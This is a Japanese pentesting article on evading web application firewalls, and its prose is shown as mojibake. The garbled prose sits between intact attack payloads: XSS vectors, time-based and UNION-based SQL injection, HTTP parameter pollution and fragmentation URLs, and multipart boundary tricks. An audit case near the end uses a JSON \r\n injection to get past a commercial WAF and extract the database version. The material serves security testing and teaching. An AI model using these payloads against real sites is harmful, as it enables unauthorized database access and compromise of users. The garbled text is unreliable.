ãã®å Žåãä»ã®åºåãæåã«çœ®ãæããããšãã§ããŸãã
ãããã£ãŠãããšãã°ãç¹æ®æåããšã³ã³ãŒãããããã«ãããŸããŸãªãšã³ã³ãŒããä»ã®æ¹æ³ãšçµã¿åãããããšããå§ãããŸãã
éå®åã®åçã®æ§ææ§æèŠçŽ ãæ€çŽ¢ãã
ãã®æ¹æ³ã¯ãWAFéçºè ã«ãã£ãŠèæ ®ãããŠããªãå¯èœæ§ã®ããæäœæ¹æ³ãèŠã€ããããšããŸãã¯ãã¯ãã«ãæ©æ¢°åŠç¿ã®ãã¬ãŒãã³ã°ã»ããããæ¬ èœããŠããããšããæããŸãã äžéšã®javascripté¢æ°ã¯ãåçŽãªäŸãšããŠæå®ã§ããŸãïŒthisãtop selfãparentãframesãtagããããã£ïŒdata-bindãontoggleãonfilterchangeãonbeforescriptexecuteãonpointeroverãsrcdocãããã³SQLã¹ããŒãã¡ã³ãïŒlpadãfieldãbit_countã
以äžã«äŸã瀺ããŸãã
<script>window['alert'](0)</script> <script>parent['alert'](1)</script> <script>self['alert'](2)</script>
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
JavaScriptåŒã®æåããªãŒè¡šçŸã䜿çšããããšãã§ããŸãã
ãã®JSã®ãã¥ãŒã«é¢ããæãããªåé¡ã¯ãçµæã®ãã€ããŒããé·ãããšã§ãã
ãããšã¯å¥ã«ããã®ææ³ã䜿çšããWAFã®ãã€ãã¹ã¯ãç¹å®ã®æ»æãšäœ¿çšäžã®ãã¯ãããžãŒã¹ã¿ãã¯ã«äŸåããããšã«æ³šæããŠãã ããã äŸã¯ãã»ã³ã»ãŒã·ã§ãã«ãªãšã¯ã¹ããã€ãImageTragickã®ç¶æ³ã§ãã
ãã®æ»æããä¿è·ããããã®ã»ãšãã©ã®WAFã¯ããã®è匱æ§ã説æããã»ãšãã©ã®èšäºããã³PoCã§äœ¿çšãããŠããããŒã¯ãŒãurlãcapacityãlabelããã©ãã¯ãªã¹ãã«èŒããŸããã ãããããããã®ããŒã¯ãŒãã«å ããŠãäžæçãªãã®ããã³ãŽãªã©ãä»ã®ããŒã¯ãŒãã䜿çšã§ããããšãããã«ããããŸããã ãã®çµæããããã®ããŒã¯ãŒãããã¯ã¿ãŒãšããŠäœ¿çšããŠWAFãåé¿ã§ããŸããã
HTTPãã©ã¡ãŒã¿ãŒæ±æïŒHPPïŒããã³HTTPãã©ã¡ãŒã¿ãŒæçåïŒHPFïŒ
HPPæ»æã§ã¯ããµãŒããŒãåãååã®ãã©ã¡ãŒã¿ãŒãåŠçããæ©èœã䜿çšããŸãã WAFã®å¯èœãªåé¿çã¯æ¬¡ã®ãšããã§ãã
ãµãŒããŒã¯æåŸã«åãåã£ããã©ã¡ãŒã¿ãŒã䜿çšããWAFã¯æåã®ãã©ã¡ãŒã¿ãŒã®ã¿ããã§ãã¯ããŸã
ãµãŒããŒã¯ãã¹ãŠåããã©ã¡ãŒã¿ãŒã®å€ãçµåããWAFã¯ããããåå¥ã«ãã§ãã¯ããŸãã 次ã®è¡šã䜿çšããŠãç°ãªããµãŒããŒéã§åããã©ã¡ãŒã¿ãŒãåŠçããéã®éããæ¯èŒã§ããŸãã

次ã«ãHPFæ»æã¯ãWebã¢ããªã±ãŒã·ã§ã³ã®ããžãã¯ããªã¯ãšã¹ãå ã®2ã€ä»¥äžã®ãã©ã¡ãŒã¿ãŒãçµã¿åãããå Žåãæ»æè ããªã¯ãšã¹ããéšåã«åå²ããããã«ãã£ãŠäžéšã®WAFãã§ãã¯ããã€ãã¹ã§ãããšããäºå®ããæããŸãã
ãã®ãããªæ»æã®äŸã¯ã次ã®åœ¢åŒã®SQLã€ã³ãžã§ã¯ã·ã§ã³ã§ãã
http://test.com/url?a=1+select&b=1+from&c=base
HPFãšHPPã¯éåžžã«ãã䌌ãæ»æã§ãããæåã®æ»æãWebã¢ããªã±ãŒã·ã§ã³ã察象ãšããŠããå Žåã2çªç®ã®æ»æã¯ãããæ©èœããç°å¢ã«å¯Ÿãããã®ã§ãã ãããã®ææ³ãåæã«äœ¿çšãããšãWAFãåé¿ããå¯èœæ§ãããã«é«ãŸããŸãã
Unicodeæ£èŠå
Unicodeã«ã¯ãUnicodeæ£èŠåãšãã1ã€ã®æ©èœããããŸãã ããã¯ãã¹ãã«ã䌌ãŠããäžéšã®Unicodeæåãæ¯èŒã§ããããã«ããããã«è¡ãããŸãããããšãã°ãæåã 'ããšãáµãã«ã¯ç°ãªãã³ãŒãããããŸããããã¯ãéãã¯ãªããæ£èŠååŸã¯äž¡æ¹ãšãåçŽãªæåã«ãªããŸã'ãšåããšèŠãªãããŸãã æ£èŠåã䜿çšãããšãäžéšã®è€éãªUnicodeæåãããåçŽãªUnicodeæåã«å€æã§ããŸãã ãã¹ãŠã®å¯èœãªUnicodeæåããå¯èœãªæ£èŠåãšãšãã«ç€ºãããŠããè¡šããããŸãã ãã®å©ããåããŠãããŸããŸãªãã€ããŒããäœæããä»ã®æ¹æ³ãšçµã¿åãããããšãã§ããŸãã ãã ããããã¯ãã¹ãŠã®Webã¢ããªã±ãŒã·ã§ã³ã§æ©èœããããã§ã¯ãããŸããã
ããšãã°ãäžã®è¡šã§ã¯ãæå
ïŒ
ãš
ï¹€
æå
<
å€æãããããšããããŸãã ãã ããã¢ããªã±ãŒã·ã§ã³ãæ£èŠååŸã«HTMLãšã³ã³ãŒãã䜿çšããå Žåãããããæ£èŠååŸã«ååŸããã
<
æåã¯
<
ãšã³ã³ãŒãããããããæ£èŠåã®æ®µéãéèŠã§ããããšã«æ³šæããŠãã ãã
<
ã ãã ããå¥ã®ã±ãŒã¹ã§ã¯ãéçºè ã¯ãã®æ©èœãèæ ®ã«å ¥ãããUnicodeæåããšã³ã³ãŒãã§ããŸããã§ããã ãããã£ãŠãXSSã«å€æã§ãããšã³ã³ãŒããããŠããªã<ããã³>æåãååŸããŸãã ãŸããWAFã«ã¯Unicodeæåã®ç解ã«åé¡ãããå Žåãããããã®ãããªããªãã¯ã®ã«ãŒã«ããªãå Žåããããæ©æ¢°åŠç¿ãç¡åãªå ŽåããããŸãã Unicodeæ£èŠåã䜿çšããWebã¢ããªã±ãŒã·ã§ã³ã§WAFã®åé¿çãèŠã€ããå Žåã <>æåã ãã§ãªãããã€ããŒãã®ãã®ä»ã®æåãå€æŽã§ããŸãã
äŸïŒ
ïŒimg src﹊x onerrorïŒalertïžµ1)>
Rockstarã¯æè¿ãHackerOneã§ããã®åé¡ãçºèŠããŸããããWAFã¯ãªãããŠãŒã¶ãŒå ¥åã®å³å¯ãªãã£ã«ã¿ãªã³ã°ã®ã¿ããããŸããã
hackerone.com/reports/231444
hackerone.com/reports/231389
ããŒã¯ã³ãã¬ãŒã«ãŒ
ããŒã¯ã³ã«åããããæ»æã¯ãããããããŒã¯ã³ãã¬ãŒã«ãŒã䜿çšããŠãªã¯ãšã¹ããããŒã¯ã³ã«åå²ããããžãã¯ãç Žãããšããè©Šã¿ã«é¢é£ããŠããŸãã ãããã¯ãç¹å®ã®ããŒã¯ã³ãžã®æååèŠçŽ ã®å¯Ÿå¿ã®éžæã«åœ±é¿ãäžããããã«ãã£ãŠçœ²åã«ããæ€çŽ¢ããã€ãã¹ã§ããããã«ããã·ã³ãã«ã§ãã ããŒã¯ã³ãã¬ãŒã«ãŒã䜿çšããæ»æã®äŸã¯ã次ã®ã¯ãšãªã§ãã
SELECT-@1,version()
ããã§-@ -ããã¯ããŒã¯ã³ãã¬ãŒã«ãŒã§ãã
ãããªãã¯ãã¡ã€ã³ã«ã¯ãmysqlãã¡ãžã³ã°ã«ãã£ãŠååŸãããlibinjectionã§ãªã¯ãšã¹ãããã§ãã¯ããããšã«ããåŸãããããŒãã·ãŒãããããŸã ã
libinjectionã§åé¡ãèŠã€ãããšãããããã¯ã¯æ°ãããã®ã§ã¯ãªããªããŸãã;詳现ã¯ããã«ãããŸãïŒ
å¥ã®ãã§ã€ã¶ãŒ
èšäºã®æé
èšäº2
RFCæ©èœã®äœ¿çš
HTTP / 1.1ãããã³ã«ããã³ããŸããŸãªèŠæ±åœ¢åŒïŒmultipart / form-dataãªã©ïŒã®ä»æ§ã§ã¯ãããããŒãšãã©ã¡ãŒã¿ãŒãåŠçããéã®å¢çã±ãŒã¹ãŸãã¯ããªãã¯ã«é¢é£ããèå³æ·±ãç¹ãèŠã€ããããšãã§ããŸãã WAFéçºè ã¯ããã®ãããªç¬éãèæ ®ã«å ¥ããªãããšããããããŸãããã®çç±ã¯ãWAFãèŠæ±ã誀ã£ãŠè§£æããæ»æãã¯ãã«ãé ãããŠããå¯èœæ§ã®ããããŒã¿ã®äžéšã倱ãå¯èœæ§ãããããã§ãã WAFã®åé¡ã®ã»ãšãã©ã¯ãmultipart / form-dataã®åŠçãšããã®ãããªãªã¯ãšã¹ãã®ãã©ã¡ãŒã¿ãŒã®å¢çãå®çŸ©ããå¢çãã©ã¡ãŒã¿ãŒã®ç¹å®ã®å€ã«é¢é£ããŠããŸãã ããã«ããµãŒããŒéçºè ããã¹ãç¯ãå¯èœæ§ããããä»æ§ãåžžã«å®å šã«ãµããŒãããŠããããã§ã¯ãããŸããããã®ããããµãŒããŒã®HTTPããŒãµãŒã«ææžåãããŠããªãæ©èœããããŸãã
åè¿°ã®ããã«ãmultipart / form-dataã䜿çšããHTTPèŠæ±ã®å¢çãã©ã¡ãŒã¿ãŒã¯ãèŠæ±æ¬æã®ããŸããŸãªãã©ã¡ãŒã¿ãŒãåºåã圹å²ãæãããŸãã RFCã«ããã°ãæ°ããåPOSTãã©ã¡ãŒã¿ãŒã®åã«ãã-ããå«ããã¬ãã£ãã¯ã¹ãæã€ä»¥åã«æå®ãããå¢çã瀺ãããããããµãŒããŒã¯ããŸããŸãªèŠæ±ãã©ã¡ãŒã¿ãŒãåºå¥ããŸãã
POST /vuln.php HTTP/1.1 Host: test.com Connection: close Content-Type: multipart/form-data; boundary=1049989664 Content-Length: 192 --1049989664 Content-Disposition: form-data; name="id" 287356 --1049989664--
æ»æã¯ãå¢çãã©ã¡ãŒã¿ãŒã空çœã®ãŸãŸã®å ŽåããµãŒããŒãšWAFãç¶æ³ãç°ãªãæ¹æ³ã§åŠçããããšã§ãã RFCã«åºã¥ããŠããã®ç¶æ³ã§ã¯ããã©ã¡ãŒã¿ãŒéã®å¢çã¯æåã·ãŒã±ã³ã¹ã-ãã«ãªããŸãã ãã ããWAFã§ã¯ããã®æ©èœãèæ ®ããªãããŒãµãŒã䜿çšã§ããŸãããã®ãããPOSTèŠæ±ã®ãã©ã¡ãŒã¿ãŒããã®ããŒã¿ã¯ã¢ãã©ã€ã¶ãŒã«å ¥ããªããããWAFã¯èŠæ±ãã¹ãããããŸãã WebãµãŒããŒã¯ããã®ç¶æ³ãåé¡ãªã解æããåŠçã®ããã«ããŒã¿ãããã«è»¢éã§ããŸãã
POST /vuln.php HTTP/1.1 Host: test.com Connection: close Content-Type: multipart/form-data; boundary= Content-Length: 192 -- Content-Disposition: form-data; name="id" 123' or sleep(20)# ----
ZeroNights 2016ã§ã®Bo0omã®ã¬ããŒããããããã«èå³æ·±ãäŸãæããŠèª¬æããŸãã
POST /vuln.php HTTP/1.1 Host: test.com Content-Type: multipart/form-data; boundary=FIRST; Content-Type: multipart/form-data; boundary=SECOND; Content-Type: multipart/form-data; boundary=THIRD; --THIRD Content-Disposition: form-data; name=param UNION SELECT version() --THIRD--
ãã®æ»æã§ã¯ãWAFãåãå ¥ããå¢çãã©ã¡ãŒã¿ãŒãšWebãµãŒããŒã決å®ããããšããŠããŸãã ãããã£ãŠãWebãµãŒããŒãšWAFãç°ãªãå¢çãã©ã¡ãŒã¿ãŒãåãå ¥ããå ŽåãWAFãèªèããªãæçµå¢çãæå®ããããšã§æ»æãå®è¡ããããšãã§ããŸãã ãã®ãããªæ»æã¯HPPã«ãããã䌌ãŠããŸãã
POST /vuln.php HTTP/1.1 Host: test.com Content-Type: multipart/form-data; xxxboundaryxxx=FIRST; boundary=SECOND; --FIRST Content-Disposition: form-data; name=param UNION SELECT version() --FIRST--
ãã®æ»æã¯ãWAFãšWebãµãŒããŒã®éã§HTTPãªã¯ãšã¹ãã解æããéã«èããããå¥ã®éãã®ããã«èšèšãããŠããŸãã éãã¯æ¬¡ã®ãšããã§ããå¿ èŠããããŸããWebãµãŒããŒåŽã®ããŒãµãŒã¯ãå¢çãã®æåã®åºçŸãæ€çŽ¢ããèšå·ã=ããæ€çŽ¢ãããã®åŸã§ã®ã¿å¢çã®å€ã決å®ããWAFããŒãµãŒã¯æååãå¢ç=ãã®åºçŸã®ã¿ãæ€çŽ¢ããŠãã決å®ããŸãå¢çå€ã ãããã®æ¡ä»¶ãæºããããŠããå Žåããã®ãããªèŠæ±ãåä¿¡ãããšãWAFã¯æå®ãããå¢çãèŠã€ããããšãã§ããããããã£ãŠããã©ã¡ãŒã¿ãŒãèŠã€ããŠåæããããšãã§ããŸããã WebãµãŒããŒã¯èŠæ±ãåä¿¡ãããã©ã¡ãŒã¿ãŒãåŠçããŸãã ãã®æ»æã¯ãWebãµãŒããŒããŒãµãŒããšã³ããªãboundary =ããæ¢ããŠãããWAFããŒãµãŒããå¢çãã®ã¿ãæ¢ããŠããå Žåã«æ©èœããŸãããã®å Žåãå®éã®å¢çãFIRSTããSECONDã«å€æŽããã ãã§ãã
POST /somepage.php HTTP/1.1 Host: test.com Content-Type: multipart/form-data; boundary=Test0x00othertext; --Test Content-Disposition: form-data; name=param Attack --Test--
ãã®æ»æã¯ãç¹æ®æåã®è¿œå ã«ãé¢é£ããŠããŸãã WebãµãŒããŒãå¢çãã©ã¡ãŒã¿ãŒãNULLãã€ãã«ããªã ããWAFãå šäœãšããŠãããåãå ¥ãããšæ³å®ããŠãå¢çãã©ã¡ãŒã¿ãŒã«NULLãã€ããè¿œå ããŸããã ãã®å Žåãå¢çãèŠã€ããããªããããWAFã¯åã³ãã©ã¡ãŒã¿ãŒãåæã§ããŸããã
æ©æ¢°åŠç¿ã®ãã€ãã¹
ãã€ãã¹ã®æ¬è³ªã¯æããã§ã-èšç·Žãããçµ±èšã¢ãã«ã®ãã©ã¡ãŒã¿ãŒãæºãããããªæ»æãè¡ãããšã ãã ããã©ã®WAFãµã³ãã«ãã©ã®ããã«ãã¬ãŒãã³ã°ããããã«å€§ããäŸåããŸãã æãç©ŽãèŠã€ããããšãããã°ãååãšããŠè¿åãã§ããªãããšããããŸãã éåžžãæ©æ¢°åŠç¿ãåããWAFãã¯ã©ã€ã¢ã³ãã«å±éããå Žåãã¯ã©ã€ã¢ã³ãã®Webã¢ããªã±ãŒã·ã§ã³ã§åä¿¡ãããªã¯ãšã¹ãã«åºã¥ããè¿œå ã®ãã¬ãŒãã³ã°ãå¿ èŠã§ãã ãããŠãããã§ã®ãã³ãã¹ã¿ãŒã®åé¡ã¯ã次ã®ãããªãã®ã§ããå¯èœæ§ããããŸãïŒåãå€èŠ³ãæã£ãŠããããèŠæ±ããšã«å€§ããå€åããªããã©ã¡ãŒã¿ãŒã¯ãéåžžã®åœ¢åŒã®ãã©ã¡ãŒã¿ãŒããé¢ããã¹ãããããã§ã«ç°åžžãšããŠèªèãããŠããå¯èœæ§ããããããäœããã®æ¹æ³ã§ãã¹ãããããšã¯äžå¯èœã§ãã äŸã§èª¬æããŸãããã
http://api.test.com/getuser?id=123
ãžã®æ¡ä»¶ä»ããªã¯ãšã¹ããããå Žåãidãã©ã¡ãŒã¿ãŒã¯åžžã«æ°å€ã§ããããã¬ãŒãã³ã°ã»ããã§ãåžžã«æ°å€ã®ãŸãŸã§ãã æ©æ¢°åŠç¿ã¢ãžã¥ãŒã«ããã®ãã©ã¡ãŒã¿ãŒã®æ°å€ä»¥å€ãæ€åºããå Žåãããã¯ç°åžžã§ãããšå€æããå¯èœæ§ãæãé«ããªããŸãã ãŸããå¥ã®ã±ãŒã¹ã§ã¯ãWAFããããŒã¯ããŠã³ãæã€POSTãã©ã¡ãŒã¿ãŒã䜿çšããŠ
http://api.test.com/setMarkDown
ãžã®POSTèŠæ±ãåé¡ããããšãåŠç¿ãããšããŸãã ãã¡ãããåŒçšç¬Šãšç¹æ®æåããããŠå®éã«ã¯ä»ã®ãã®ã¯ãããŒã±ããããŠã³ã«ååšããå¯èœæ§ããããŸãã ãã®å ŽåãWAFã¯åŒçšç¬Šãšç¹æ®æåã蚱容ãããããæ©æ¢°åŠç¿ã¢ãžã¥ãŒã«ã®ãã€ãã¹ãã¯ããã«ç°¡åã«ãªããŸãã
ãŸããå®è·µã®äŸã䜿çšããŠãäžèšã®åé¿çãåå ã®è§£æãã©ã¡ãŒã¿ãŒã®åé¡ã«ãããããžãã¹ãæ©æ¢°åŠç¿ã¢ãžã¥ãŒã«ã«åžžã«å°éãããšã¯éããªãããšã瀺ããŸãã
äžè¬ã«ããã¹ãããããªã¯ãšã¹ããšãã®äžã®ãã©ã¡ãŒã¿ãŒã®è©³çŽ°ãèæ ®ããWAFã蚱容ã§ãããã©ã¡ãŒã¿ãŒå€ã®å¯èœãªããªãšãŒã·ã§ã³ãæ³å®ããŠããããããéå§ããå¿ èŠããããŸãã
WAFã¯ãã€åœ¹ã«ç«ã¡ãŸãããïŒ
WAFã¯ã¯ãšãªãåæããã¯ãšãªã®ç°åžžãªåäœãæ¢ãããšãç®çãšããŠããŸãããWAFãæ€åºã§ããªãè匱æ§ã®ã¯ã©ã¹ãããã€ããããŸãã è«ççãªè匱æ§ã§ããå¯èœæ§ããããŸãããã®å Žåããªã¯ãšã¹ãã«ã¯ç°åžžãªåäœã¯ãããŸããããWebã¢ããªã±ãŒã·ã§ã³ã®ããžãã¯ã«éåããã¢ã¯ã·ã§ã³ãããã€ããããŸãã WAFã¯ã競åç¶æ ãIDORãå®å šã§ãªããŠãŒã¶ãŒèªèšŒãªã©ã®è匱æ§ã®èå¥ã«ã圹ã«ç«ããªãå¯èœæ§ããããŸãã
æ¢åã®ã¢ããªã±ãŒã·ã§ã³
WAFããã€ãã¹ããæ¹æ³ã®æ€çŽ¢ãèªååããããã«ããã®åéã®æ奜家ã«ãã£ãŠæžãããããã€ãã®ããŒã«ããããŸãã
泚ç®ãã¹ãæãèå³æ·±ããã®ã¯æ¬¡ã®ãšããã§ãã
é»çãã¬ãŒã ã¯ãŒã¯ã¯ãWAFã§ä¿è·ãããWebã¢ããªã±ãŒã·ã§ã³ããã¹ãããããã®ãã¬ãŒã ã¯ãŒã¯å šäœã§ããPythonã§æžãããŠãããããã«Burp Suiteã®ãã©ã°ã€ã³ãšããŠç§»æ€ãããŠããŸãããã®äž»ãªæ©èœã¯2ã€ã®ã¢ã«ãŽãªãºã ã§ãã
- GOFAã¯ã¢ã¯ãã£ããªåŠç¿ã¢ã«ãŽãªãºã ã§ãããWebã¢ããªã±ãŒã·ã§ã³ã®ãã£ã«ã¿ãªã³ã°ãšãµãã¿ã€ãºã®ãã©ã¡ãŒã¿ãŒãåæã§ããŸãã
- SFADiffã¯ãã·ã³ããªãã¯æéç¶æ ãã·ã³ïŒSFAïŒã䜿çšãããã¬ãŒãã³ã°ã«åºã¥ããã©ãã¯ããã¯ã¹å·®åãã¹ãã¢ã«ãŽãªãºã ã§ããããã«ãããWebã¢ããªã±ãŒã·ã§ã³ã®åäœã®éããèŠã€ããããšãã§ããŸããããã«ãããWAFãèå¥ããåé¿çãèŠã€ããããšãã§ããŸãã
Bypass WAFã¯Burp Suiteã®ãã©ã°ã€ã³ã§ããããã«ãããHPPæ»æã®èªååãªã©ãäžå¿ èŠãªå°é£ã䌎ãããšãªããããŸããŸãªã«ãŒã«ããã³ã³ãŒãã£ã³ã°ã®å€æŽã«åŸã£ãŠããªã¯ãšã¹ãæ¬æã®èŠçŽ ã«èªåå€æŽãæ§æã§ããŸãã
WAFW00Fã¯ãPythonã§æžãããWAFèªèšŒããã°ã©ã ã§ããããã¯ããªãè¯ãWAFããŒã¹ãæã¡ãä»æ¥ãŸã§ãµããŒããããŠããŸãããã ããããŸããŸãªWAFã¯ãããžã§ã¯ãèªäœãæŽæ°ããããããã¯ããã«é«éã«æŽæ°ããããããçµæã¯äŸç¶ãšããŠäžæ£ç¢ºã«ãªãå¯èœæ§ããããŸãã
å®éã«WAFã移åãã

ç§ãã¡ã¯ç·Žç¿ããå®éã®äºäŸã«ç®ãåããŸãããµã€ããPT AFã«ãã£ãŠä¿è·ãããŠãããªã³ã©ã€ã³ã¹ãã¢ã®ç£æ»ãå®æœããŸããã WAFã®ãããè匱æ§ãçºèŠãããããããã«ãããŠåé¿çãæ¢ãããšã¯å°é£ã§ãããããããããã«ãWAFããã£ã«ã¿ãªã³ã°ããªãã£ãWebã¢ããªã±ãŒã·ã§ã³ã®äžéšã§éæšæºã®åäœãçºèŠãããŸãããè³Œå ¥ããååã®å±¥æŽã®æ€çŽ¢æ©èœã§ç°åžžãèŠã€ãããŸãããããã¯æ¬¡ã®ãã®ã§æ§æ
ãããŠããŸããããªã¯ãšã¹ãã¯JSON圢åŒã§éä¿¡ããã次ã®ããã«ãªããŸããã
{"request":{"Count":10,"Offset":0,"ItemName":"Phone"}}
ItemNameãã©ã¡ãŒã¿ãŒã®å€Phone 'ããã³Phone' + 'ãä»£å ¥ãããšãããã2ã€ã®ã±ãŒã¹ã®ãµãŒããŒãç°ãªãå¿çãè¿ãããšãããããŸãããPhone 'ããã®ãªã¯ãšã¹ããžã®å¿çã¯ç©ºã§ãPhone' + 'ããã®ãªã¯ãšã¹ããžã®å¿çã«ã¯ãItemNameãã©ã¡ãŒã¿ã®å€ãPhoneã®ã¿ã§ãããã®ããã«ãååã«Phoneãšããåèªãå«ãŸããåã補åããŒã¿ãå«ãŸããŠããŸããããã®åäœã¯å€ãã®ããã«ãŒããã³ãã¹ã¿ãŒã«ââããç¥ãããŠãããWebã¢ããªã±ãŒã·ã§ã³ã§ã®ãŠãŒã¶ãŒå ¥åã®ãã£ã«ã¿ãªã³ã°ã«åé¡ãããããšãæ確ã«ç€ºããŠãããSQLã€ã³ãžã§ã¯ã·ã§ã³ãåŒãèµ·ãããŸãã
ãªãããããªãã®ããSQLã€ã³ãžã§ã¯ã·ã§ã³ã®äŸã§ãããèµ·ããçç±ã説æããŸãããããã€ã³ãã¯ããã®åäœãWebã¢ããªã±ãŒã·ã§ã³ã§æ€åºãããå Žåãã»ãšãã©ã®å ŽåãSQLã¯ãšãªã®ããŒã¿ã¯ã¯ãšãªèªäœãšåçŽã«é£çµããæåã®ã±ãŒã¹ã§ã¯Phone 'ãã©ã¡ãŒã¿ãŒãæž¡ããšSQLã¯ãšãªãçæããããšããããšã§ãã
SELECT item FROM items WHERE item_name='Phone''
ãã®ãããªãªã¯ãšã¹ãã¯ãæ§æãæ£ãããªãããæããã«å®è¡ããããçµæãè¿ããŸããããããŠãPhoneãã©ã¡ãŒã¿ãŒ'+'ãæã€2çªç®ã®ãªã¯ãšã¹ãã¯ã次ã®ããã«ãªããŸãã
SELECT item FROM items WHERE item_name='Phone'+''
ãã®ãããªãªã¯ãšã¹ãã¯æ£ããæ§æãæã¡ãPhoneãšããååã®è£œåãéžæããŸãã
ãã®è匱æ§ãæ€åºããæ¹æ³ã¯ãWAFã§ä¿è·ãããŠããWebã¢ããªã±ãŒã·ã§ã³ããã¹ããããšãã«å€§ããªå©ç¹ããããŸããåäžåŒçšç¬Šæåã¯ãã»ãšãã©ã®ææ°ã®WAFã§ã¯ãã©ã¡ãŒã¿ãŒã®ååãªç°åžžãšã¯èŠãªããããããã䌎ãèŠæ±ãã¹ãããããŸãã
æ€åºãèŠã€ããŸããããä»åºŠã¯WAFããã€ãã¹ããŠè匱æ§ãæªçšããæ¹æ³ãæããŠãã ãããããã€ãã®åé¿çãæŽçããåŸã調æ»äžã®WAFã§åé¡ãèŠã€ãããŸããã WAFã¯JSONãã©ã¡ãŒã¿ãŒã«è¿œå ãããç¹æ®æåã«å¯ŸããŠè匱ã§ããããšãå€æããŸãããåºæ¬çã«ãJSONããã¹ããã£ãŒã«ãã«\ r \ næåãä»£å ¥ãããšã³ã³ãŒããªãã®çã®åœ¢åŒã§ãWAFã¯åã«ãªã¯ãšã¹ããæž¡ããWebã¢ããªã±ãŒã·ã§ã³ã¯ããŒã¿ãæ£ãããšèŠãªããŠåŠçããŸãããã©ããããåé¡ã¯JSONããŒãµãŒã§ãããç¹æ®æåãšJSONããŒãµãŒããããã®æåãçŸããå Žæã«æ£ç¢ºã«çŸããããã«èšèšãããŠããªãã£ãããã§ãããããã£ãŠãWAFã¢ãã©ã€ã¶ãŒã¯å®å šãªèŠæ±ãåä¿¡ãããç¹æ®æåã®åŸã«ç¹æ®ãªæ»æãã¯ãã«ãæ¿å ¥ã§ããŸããæ¹è¡ã«å ããŠãä»ã®ç¹æ®æåãããšãã°ãã«ãã€ããæ©èœããŸããããã®çµæã次ã®ã¯ãšãªãäœæããããšãã§ããŸãããå®éããã®ã¯ãšãªå šäœãæ€èšŒããããšãããšWAFããªãã«ãªããŸããïŒæ¹è¡æåãšåŸ©åž°æåã¯ããã¹ãè¡šçŸã«çœ®ãæããããŸããïŒã
{"request":{"kill-waf":"die\r\n", "Count":10,"Offset":0,"ItemName":["'+(SELECT 'Phone'+CHAR(ASCII(substring(@@version,1,1))-24))+'"]}}
ãã®çµæãè匱æ§ã®æç¡ã«ã€ããŠãã¹ãŠã®ãã©ã¡ãŒã¿ãŒãè¿ éãã€äŸ¿å©ã«ãã¹ãããããšãã§ããŸããïŒãã®çµæãä»ã®ã¯ãšãªã§ãŸã ããã€ããèŠã€ãããŸããïŒã WAFããã€ãã¹ããŠãã®ã€ã³ãžã§ã¯ã·ã§ã³ãæªçšãããšãWebã¢ããªã±ãŒã·ã§ã³ã®ãã¹ãŠã®ãŠãŒã¶ãŒãå®å šã«äŸµå®³ãããŸããã
Nemesida WAFã§ãåæ§ã®åé¡ãèŠã€ãããŸãããå¯äžã®éãã¯ããªã¯ãšã¹ããJSON圢åŒã§ã¯ãªãããã©ã¡ãŒã¿ãŒä»ãã®éåžžã®POSTãªã¯ãšã¹ãã§ãããWebã¢ããªã±ãŒã·ã§ã³ã®ãã©ã¡ãŒã¿ãŒèªäœãæ°å€ãšããŠSQLã¯ãšãªã«çœ®ãæããããããšã§ããæ®å¿µãªãããNemesida WAFã®éçºè ã¯çŸæç¹ã§å ¬éãçŠæ¢ããŠãããããçŸæç¹ã§ã¯æè¡çãªè©³çŽ°ãå ¬éããããšã¯ã§ããŸããããã ããåŸã§å ¬éããŸããåé¡ã¯Pentestitã«å ±åãããä¿®æ£ãããŸããã
ã芧ã®ãšãããWAFã¯éåžžã«è¿ä»£çã§éåžžã«ã€ã³ããªãžã§ã³ãã§ãããæ®å¿µãªãã1ã€ã®ç¹æ®æåãæ¿å ¥ããã ãã§ãã€ãã¹ã§ããå ŽåããããŸããããã§ã®åé¡ã¯ãçŸæç¹ã§ã¯WAFã§ãå¯èœãªãã¹ãŠã®ãµãŒããŒã®å¯èœãªå ¥åããŒã¿ã®ãã¹ãŠã®ãªãã·ã§ã³ãé 眮ããããšã¯äžå¯èœã§ãããæ©æ¢°åŠç¿ã¯WAFã§å¿ èŠãªãã®ã§ãããããŒãµãŒã§ã€ãŸãããäžéšã®ç¹æ®æåãèŠããããšã§ãæãããã
ãããã«

æ®å¿µãªããããã¹ãŠã®éçºè ããããç解ããŠããããã§ã¯ãªããäœããã®çç±ã§WAFãããã«ãŒããã®ç¹å¹è¬ãšèããŠããŸããããšãã°ãç£æ»ã®1ã€ã§ãWAFããã€ãã¹ããæ¹æ³ãçºèŠããŸãããããã«ãããè匱æ§ãæªçšã§ããããã«ãªããŸãããç£æ»åŸã«åŠãã ããã«ãéçºè ã¯æ¢ã«WAFã§ä¿è·ãããŠããªãWebã¢ããªã±ãŒã·ã§ã³ãç£æ»ããŠãããååã®ç£æ»ã§ãããã®è匱æ§ã¯ãã§ã«çºèŠãããŠããŸããããããããéãã代ããã«ãæ©æ¢°åŠç¿ãåããææ°ã®WAFãè³Œå ¥ããããšã«ããŸãããããŠåœŒã«å®å šã«äŸåããŠããŸãã Webã¢ããªã±ãŒã·ã§ã³éçºè ãæ¢ç¥ã®è匱æ§ãä¿®æ£ããããšãWAFãã³ããŒã䞻匵ããªãã£ãããšã¯æ®å¿µã§ãããŸãã¯ãéçºè èªèº«ããã³ãŒãå ã®ãã°ãä¿®æ£ãããããWAFã®æ¹ãåªããŠãããšå€æããŸããããããã詳现ã¯ããããŸããããããã«ããããããã¯ã©ã¡ããWAFãã³ããŒã®éåžžã«æªãç¿æ £ã§ãããéçºè ããã
ãŸããWAFã§ã®æ©æ¢°åŠç¿ã¯ãã©ãã¯ããã¯ã¹ã®ãŸãŸã§ãããå®éã®å¹æçãªä¿è·æ¹æ³ãšãããããããŒã±ãã£ã³ã°ã®åããšããŠèªèãããããšã«æ³šæããŠãã ããã
